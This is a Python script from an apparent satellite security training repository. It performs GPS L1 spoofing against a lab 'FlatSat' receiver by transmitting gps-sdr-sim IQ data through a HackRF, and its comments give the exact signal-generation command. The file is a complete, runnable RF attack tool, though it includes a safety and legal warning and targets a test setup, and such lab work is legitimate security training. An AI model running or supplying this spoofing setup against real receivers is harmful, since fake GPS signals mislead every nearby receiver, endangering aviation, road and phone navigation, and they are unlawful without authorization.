#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# 04_gps_spoofing_rf.py -- GPS L1 spoofing against the FlatSat's onboard GPS
# receiver, so it reports a fake position (default: Area 51, 37.2431N
# -115.7930W) instead of its real one.
#
# This is a DIFFERENT attack surface than every other script in this
# dossier: 01/02/03/07/00 all attack the CCSDS/LoRa uplink-downlink link
# (918/916MHz, the FlatSat's own SX1262 radios). This one instead attacks
# the FlatSat's separate, real hardware GPS module (New-firmware/pins.h:
# PIN_GPS_TX/PIN_GPS_RX, a genuine UART feeding real NMEA sentences into
# Serial1 -- see New-firmware/sensors.cpp's gpsPoll()/gpsRead()) by
# overpowering the real GPS L1 signal (1575.42MHz) with a fake one
# generated by gps-sdr-sim. No CCSDS packet, no encryption, no APID --
# the FlatSat's GPS chip just locks onto whichever L1 signal is
# strongest and believes it, exactly like any commercial GPS receiver
# would (this is the well-known, general GPS spoofing problem -- GPS has
# no signal authentication at the receiver level).
#
# Does NOT reuse any of this repo's own SPP/AES/LoRa code (lib/
# pwnsat_packets.py, pwnsat_lora_tx.py, etc.) -- none of that applies
# here. Instead shells out to `hackrf_transfer -t` on a PRE-RENDERED raw
# IQ file produced by gps-sdr-sim (github.com/osqzss/gps-sdr-sim),
# exactly like pwnsat_lora_tx.py does for its own baseband, just a
# completely different signal.
#
# The IQ file itself (hundreds of MB for even a short duration) is NOT
# part of this repo -- generated separately with an existing local
# gps-sdr-sim build (see GENERATING A NEW TARGET below for the exact
# command used for the default file). --bin-file lets you point at any
# other one.
#
# SAFETY / LEGAL NOTE -- READ BEFORE RUNNING
# ---------------------------------------------
# This transmits a fake GPS L1 signal over the air. GPS L1 spoofing
# affects EVERY GPS receiver within range, not just the FlatSat --
# phones, cars, aviation, anything with a GPS chip listening nearby.
# Intentionally transmitting fake GPS signals is regulated (in the US,
# this needs FCC authorization / falls under experimental licensing
# rules) and can be a serious safety issue outside a controlled setting.
# Keep transmissions LOW POWER, SHORT, and INDOORS/SHIELDED, with the
# antenna close to the FlatSat's own GPS antenna and nothing else -- this
# is exactly how the reference recordings this script defaults to were
# produced. Do not run this near an actual airport, road, or anywhere
# real navigation depends on GPS. This is on you to judge per venue, not
# something this script can enforce.
#
# GENERATING A NEW TARGET
# --------------------------
# Requires a local gps-sdr-sim build (github.com/osqzss/gps-sdr-sim) and
# a RINEX broadcast ephemeris file (a *recent* one fails if it's for a
# future date relative to real-world "now" -- this session's own
# environment reports 2026, but no real GNSS station has published real
# ephemeris for a date that far out, so a same-day download attempt
# returns an empty/invalid file; an older-but-complete brdc file works
# fine for a spoofing demo since the target receiver has nothing real to
# cross-check against):
#
#   ./gps-sdr-sim -e brdc0010.22n -l <lat,lon,height_m> -d 60 \
#       -s 2600000 -b 8 -p -o my_target.bin
#
# -l is static lat/lon/height (decimal degrees, meters). -d is duration
# in seconds (kept short here -- see SAFETY NOTE). -s 2600000 matches
# HackRF's default sample rate for this repo's other TX scripts. -b 8
# is signed-byte I/Q, what hackrf_transfer expects directly (no
# int8-scaling conversion step needed, unlike pwnsat_lora_tx.py's LoRa
# baseband, which starts from GNU Radio's float32 and has to convert).
# -p holds transmit power constant instead of simulating realistic path
# loss/fading -- deliberate for a demo, makes the spoofed signal
# reliably stronger than whatever real GPS signal makes it indoors.

import argparse
import shutil
import subprocess
import sys
from pathlib import Path

GPS_L1_FREQ_HZ = 1_575_420_000
DEFAULT_SAMP_RATE = 2_600_000
# Area 51 main base (Groom Lake / "Watertown"), ~37.2431N -115.7930W --
# chosen for this session's demo: recognizable, aerospace/secrecy themed,
# a safe non-political location to show the FlatSat "teleporting" to on
# PWNSAT-C3's map widget.
DEFAULT_TARGET_DESCRIPTION = "Area 51 (37.2431N, -115.7930W)"


def transmit(bin_file: str, *, frequency: int, samp_rate: int, tx_gain: int,
            amp: bool, repeat: bool, verbose: bool = True) -> None:
    hackrf_transfer = shutil.which("hackrf_transfer")
    if hackrf_transfer is None:
        raise RuntimeError(
            "hackrf_transfer not found on PATH -- install HackRF tools "
            "(`brew install hackrf`), see PWNSAT-C3's INSTALL.md (github.com/Pwnsat/PWNSAT-C3)"
        )
    cmd = [
        hackrf_transfer, "-t", bin_file,
        "-f", str(frequency), "-s", str(samp_rate), "-x", str(tx_gain),
    ]
    if amp:
        cmd += ["-a", "1"]
    if repeat:
        cmd += ["-R"]
    print(f"[RF] {' '.join(cmd)}")
    if verbose:
        subprocess.run(cmd, text=True)
    else:
        subprocess.run(cmd, text=True, capture_output=True)


def main() -> None:
    parser = argparse.ArgumentParser(description=__doc__)
    parser.add_argument("--bin-file", required=True,
                        help=f"pre-rendered gps-sdr-sim IQ file to transmit "
                             f"-- not bundled with this repo (hundreds of MB), "
                             f"generate your own, e.g. targeting {DEFAULT_TARGET_DESCRIPTION}, "
                             f"see this file's GENERATING A NEW TARGET note")
    parser.add_argument("--frequency", type=int, default=GPS_L1_FREQ_HZ,
                        help=f"GPS L1 frequency, Hz (default {GPS_L1_FREQ_HZ})")
    parser.add_argument("--sample-rate", type=int, default=DEFAULT_SAMP_RATE,
                        help=f"must match the rate the .bin was rendered at "
                             f"(default {DEFAULT_SAMP_RATE}, HackRF's own default)")
    parser.add_argument("--tx-gain", type=int, default=0,
                        help="HackRF TX (VGA) gain, dB -- default 0 "
                             "(deliberately conservative for GPS L1, see "
                             "SAFETY NOTE; raise gradually, watching for "
                             "reacquisition on the C3 dashboard, rather "
                             "than starting high)")
    parser.add_argument("--amp", action="store_true", default=True,
                        help="enable HackRF's extra amp stage (-a 1, "
                             "default on -- GPS L1 needs real gain to "
                             "compete with any real signal reaching the "
                             "antenna indoors)")
    parser.add_argument("--no-amp", dest="amp", action="store_false",
                        help="disable the amp stage")
    parser.add_argument("--repeat", action="store_true",
                        help="loop the file continuously with hackrf_transfer "
                             "-R instead of transmitting it once and stopping "
                             "-- useful to hold the spoofed fix while you show "
                             "the dashboard; Ctrl+C to stop")
    parser.add_argument("--quiet", action="store_true",
                        help="hide hackrf_transfer's own output")
    args = parser.parse_args()

    if not Path(args.bin_file).is_file():
        sys.exit(f"[!] --bin-file not found: {args.bin_file}\n"
                  f"    Generate one with gps-sdr-sim first -- see this "
                  f"file's GENERATING A NEW TARGET note.")

    print("=" * 66)
    print("PWNSAT GPS L1 spoofing -- attacks the FlatSat's real onboard GPS")
    print("module (New-firmware/sensors.cpp gpsPoll/gpsRead), NOT the")
    print("CCSDS/LoRa uplink-downlink link every other attack here targets.")
    print(f"Target: {args.bin_file}")
    print("SAFETY: keep power low, transmission short, indoors -- see this")
    print("file's own SAFETY / LEGAL NOTE before raising --tx-gain.")
    print("=" * 66)

    transmit(args.bin_file, frequency=args.frequency, samp_rate=args.sample_rate,
             tx_gain=args.tx_gain, amp=args.amp, repeat=args.repeat,
             verbose=not args.quiet)

    print("\n[+] Done. Check PWNSAT-C3's GPS/NAV panel and map widget for the")
    print("    spoofed fix -- may take a few seconds for the receiver to drop")
    print("    the real signal (if any) and reacquire the fake one.")


if __name__ == "__main__":
    main()
